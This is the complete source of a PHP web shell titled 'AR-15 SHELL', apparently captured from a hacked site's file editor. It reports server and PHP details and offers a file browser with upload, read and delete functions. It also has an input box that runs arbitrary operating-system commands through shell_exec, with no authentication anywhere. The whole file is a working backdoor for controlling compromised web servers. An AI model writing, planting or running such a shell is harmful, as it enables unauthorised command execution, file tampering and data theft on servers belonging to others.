관리-도구

편집 파일: ar.php

<html> <?php function tab(){ for($i = 0; $i < 10; $i++) { echo '&nbsp'; } } function draw_menu() { } ?> <head> <title>AR-15 SHELL</title> <link href='https://fonts.googleapis.com/css?family=Milonga' rel='stylesheet'> <link href="https://fonts.googleapis.com/css?family=Stint+Ultra+Expanded" rel="stylesheet"> <style> body{ background-color: black; color: lawngreen; font-family: 'Milonga'; } span.cat{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 15px; border-right: solid 1px; padding: 5px; } span.data{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; border-right: solid 1px; padding: 10px; } p.info{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; padding: 10px; border: solid 1px lawngreen; border-radius: 5px; } a.button{ background-color: lawngreen; color: black; font-family: 'Stint Ultra Expanded'; font-size: 12px; padding: 8px; margin-left: 10px; border: solid 1px white; border-radius: 5px; } a.button:hover{ background-color: black; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; padding: 8px; border: solid 1px white; border-radius: 5px; } div.menu{ background-color: darkslategray; color: lawngreen; list-style-type: none; border: 1px solid lawngreen; border-radius: 5px; text-align-all: center; padding: 5px; height: 40px; width: 99%; alignment: center; } a.menu{ background-color: black; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 20px; display: inline-block; padding-top: 10px; padding-left: 5px; padding-right: 5px; margin: 15px; height: 30px; width: 150px; border: 1px solid lawngreen; border-radius: 5px; box-shadow: 2px 2px black; } a.menu:hover{ background-color: lawngreen; color: black; font-family: 'Stint Ultra Expanded'; font-size: 20px; text-decoration: underline; display: inline-block; padding-top: 10px; padding-left: 5px; padding-right: 5px; margin: 15px; height: 30px; width: 150px; border: 1px solid black; border-radius: 5px; box-shadow: 2px 2px black; } a.menu:active{ background-color: white; color: black; font-family: 'Stint Ultra Expanded'; font-size: 20px; text-decoration: underline; display: inline-block; padding-top: 10px; padding-left: 5px; padding-right: 5px; margin: 15px; height: 30px; width: 150px; border: 1px solid black; border-radius: 5px; box-shadow: 2px 2px black; } table.files{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; list-style-type: none; border: 1px solid lawngreen; border-radius: 5px; text-align: center; margin-top: 30px; padding: 10px; width: 95%; alignment: center; } tr.files{ background-color: black; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 8px; width: 95%; height: 15px; border-radius: 5px; border: 1px solid lawngreen; border-radius: 2px; border-collapse: collapse; } td.files{ background-color: black; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; border: 1px solid lawngreen; border-collapse: collapse; box-shadow: 1px 0px white; } a.file{ background-color: black; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; } textarea{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; border: 1px solid lawngreen; border-radius: 5px; margin-top: 20px; padding: 5px; width: 95%; height: 60%; overflow: scroll; } input.shell{ background-color: darkslategray; color: lawngreen; font-family: 'Stint Ultra Expanded'; font-size: 12px; border: 1px solid lawngreen; border-radius: 5px; margin-top: 20px; padding: 5px; width: 95%; } </style> </head> <body> <p class="info"> <span class="cat">PHP</span> <?php echo '<span class="data">php version : '.phpversion().'</span>'; if(ini_get('safe_mode')) { echo '<span class="data">safe mode : ON</span>'; } else { echo '<span class="data">safe mode : OFF</span>'; } echo '<a class="button" href="'.$_SERVER['PHP_SELF'].'"> [home] </a>'; echo '<a class="button" href="'.$_SERVER['PHP_SELF'].'?phpinfo"> [phpinfo] </a>'; ?> </p> <p class="info"> <span class="cat">SERVER</span> <?php echo '<span class="data"> software : '.$_SERVER['SERVER_SOFTWARE'].'</span>'; echo '<span class="data"> webroot : '.$_SERVER['DOCUMENT_ROOT'].'</span>'; ?> </p> <p class="info"> <span class="cat">OS</span> <?php echo '<span class="data">'.php_uname().'</span>'; ?> </p> <center> <div class="menu"> <?php echo '<a class="menu" href="'.$_SERVER['PHP_SELF'].'?explorer">';?> file explorer</a> <?php echo '<a class="menu" href="'.$_SERVER['PHP_SELF'].'?shell">';?> shell</a> <?php echo '<a class="menu" href="'.$_SERVER['PHP_SELF'].'?exploit">';?> exploit</a> <?php echo '<a class="menu" href="'.$_SERVER['PHP_SELF'].'?code">';?> code</a> <?php echo '<a class="menu" href="'.$_SERVER['PHP_SELF'].'?tools">';?> tools</a> </div> </center> <?php if(isset($_GET['phpinfo'])) { phpinfo(); } if(isset($_FILES['upfile'])) { $tmpfile= $_FILES['upfile']['tmp_name']; move_uploaded_file($tmpfile, getcwd().'/'.$_FILES['upfile']['name']); } if(isset($_GET['delete'])) { unlink($_GET['file']); } if(isset($_GET['explorer'])) { if(isset($_GET['dir'])) { chdir($_GET['dir']); } $dir = scandir(getcwd(), 1); echo '<center><table class="files"> '; echo '<tr>'; echo '<td>'; echo 'directory : '.getcwd(); echo '</td></tr>'; echo '<tr></tr><td> <form action="'.$_SERVER['PHP_SELF'].'?explorer" method="post" enctype="multipart/form-data">'; echo '<input type="file" name="upfile" id="upfile">'; echo '<input type="submit" value="upload" name="submit_upload"></form></td>'; echo '</tr></table>'; echo '<table class="files">'; foreach ($dir as $file) { if(is_dir($file)) { echo '<tr class="files">'; echo '<td class="files">'; echo '<a class="file" href = "'.$_SERVER['PHP_SELF'].'?explorer&dir='.getcwd().'/'.$file.'"> ['.$file.']</a>'; echo '</td>'; echo '<td class="files">'.filetype($file).'</td>'; echo '<td class="files">'; echo '</td>'; echo '</tr>'; } } foreach ($dir as $file) { if(!is_dir($file)) { echo '<tr class="files">'; echo '<td class="files">'; echo $file; echo '</td>'; echo '<td class="files">'.filetype($file).'</td>'; echo '<td class="files">'; if(is_readable($file)) { echo '<a class="file" href = "'.$_SERVER['PHP_SELF'].'?read&file='.getcwd().'/'.$file.'"> [read file]</a>'; } if(is_writable($file)) { echo '<a class="file" href = "'.$_SERVER['PHP_SELF'].'?explorer&delete&file='.getcwd().'/'.$file.'"> [delete file]</a>'; echo '<a class="file" href = "'.$_SERVER['PHP_SELF'].'?append&file='.getcwd().'/'.$file.'"> [append file]</a>'; } echo '</td>'; echo '</tr>'; } } echo ' </table></center>'; } if(isset($_GET['read'])) { if(isset($_GET['read'])) { echo '<center><textarea>'; $file = fopen($_GET['file'], "r") or die('unable to open file !'); echo fread($file, filesize($_GET['file'])); echo '</textarea></center>'; } } if(isset($_GET['shell'])) { echo '<center><textarea>'; if(isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); } else { echo shell_exec('dir'); } echo '</textarea></center>'; echo '<form action="'.$_SERVER['PHP_SELF'].'?shell" method="post">'; echo '<center><input name="cmd" class="shell">'; echo '</form>'; } ?> </body> </html>